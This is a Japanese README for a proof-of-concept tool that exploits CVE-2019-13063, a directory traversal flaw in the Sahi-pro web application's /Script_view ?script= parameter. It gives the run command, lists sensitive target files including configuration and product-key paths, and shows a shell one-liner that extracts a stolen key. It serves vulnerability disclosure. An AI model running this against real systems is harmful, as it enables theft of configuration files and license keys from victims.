
Sahi-pro WebアプリケーションCVE-2019-13063に存在するディレクトリトラバーサルおよびローカルファイルインクルードの脆弱性を悪用するための概念実証ツール
Sahi-proスクリプトマネージャーWebアプリケーションに問題が発見されました。Sahi-pro Webアプリケーションの/Script_viewページにある?script=パラメータにファイルおよびディレクトリトラバーサルの脆弱性が存在します。攻撃者は特別に細工されたURLを送信することで、被害者から機密ファイルを取得・盗取できます。
これは、Sahi-pro Webアプリケーションに存在するディレクトリトラバーサルおよびファイルトラバーサルの脆弱性を悪用するための概念実証ツールです。
影響: Sahi-pro Webアプリケーションソフトウェアには、ディレクトリおよびファイルトラバーサルの脆弱性が存在し、アプリケーションからの機密情報漏洩、またはシステムファイルの直接取得に利用される可能性があります。
script_viewページの?script=パラメータはファイルおよびディレクトリトラバーサルに対して脆弱であり、ファイルの内容を一覧表示可能です。
次のように実行します:
$ python3 CVE-2019-13063-POC.py --url http://example:[REDACTED]
これにより、アプリケーションのプロダクトキーがダウンロードされます。
脆弱な?script=パラメータにダウンロードしたいファイルを付加した完全なURLを指定してください。
usage: CVE-2019-13063-POC.py [-h] [--url URL]
optional arguments:
-h, --help show this help message and exit
--url URL Specify the vulnerable URL
Sahi User properties file - \sahi_pro\userdata\config\userdata.properties
Sahi data profile - \sahi_pro\userdata\browser\ff\profiles\sahi0\prefs.js
Sahi properties file - \sahi_pro\config\sahi.properties
Sahi Product key location - \config\productkey.txt
このスクリプトはページ全体のダウンロードを試みるだけですが、一意の<ol><li> HTMLパラメータに囲まれたコンテンツを、簡単なbashワンライナーで解析することができます。
プロダクトキーを解析する例:
cat output.txt | grep "<ol><li>" | cut -d ">" -f3 | cut -d "<" -f1
1a79a4d60de6718e8e5b326e338ae533